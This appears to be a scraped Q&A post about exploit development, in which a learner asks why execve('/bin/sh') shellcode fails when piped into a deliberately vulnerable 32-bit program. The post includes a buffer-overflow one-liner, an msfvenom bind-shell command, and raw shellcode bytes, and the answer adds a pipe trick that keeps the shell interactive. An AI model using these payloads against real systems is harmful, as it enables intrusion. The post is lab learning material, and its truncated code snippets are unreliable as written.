Search code examples

Exploit Development - GETS and Shellcode

Trying to learn more about exploit dev and building shellcodes, but ran into an issue I don't understand the reason behind.

Why am I not able to run a shellcode such as execve("/bin/sh") and spawn a shell I can interact with? While on the other hand, I'm able to create a reverse / bind_tcp shell and connect to it with netcat.

Sample program:

// gcc vuln.c -o vuln -m32 -fno-stack-protector -z execstack

#include <stdio.h>
#include <string.h>

void test() {
    char pass[50];
    printf("Password: ");
    if (strcmp(pass, "epicpassw0rd") == 0) {
        printf("Woho, you got it!\n");

int main() {
    __asm__("movl $0xe4ffd4ff, %edx");  // jmp esp, call esp - POC

Sample Exploit:

python -c "print 'A'*62 + '\x35\x56\x55\x56' + 'PAYLOAD'" | ./vuln

Sample Payload (working):

msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 LHOST="" -f python

Tested multiple different execve("/bin/sh") samples, as well as creating my own, then compiled them to verify they work before using it as payload.

Such as:


  • When the shellcode execve(/bin/sh) executes, it has no connected standard input (because of GETS) and will terminate.

    The solution is to close stdin descriptor, reopen /dev/tty before executing /bin/sh.

    #include <unistd.h>
    #include <stdio.h>
    #include <sys/fcntl.h>
    int main(void) {
        char buf[50];
        printf("Yo %s\n", buf);
        open("/dev/tty", O_RDWR | O_NOCTTY);
        execve ("/bin/sh", NULL, NULL);

    Related answer: execve("/bin/sh", 0, 0); in a pipe

    It is also possible to execute the payload by using

    ( python -c "print 'A'*62 + '\x35\x56\x55\x56' + '\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'"; cat ) | ./vuln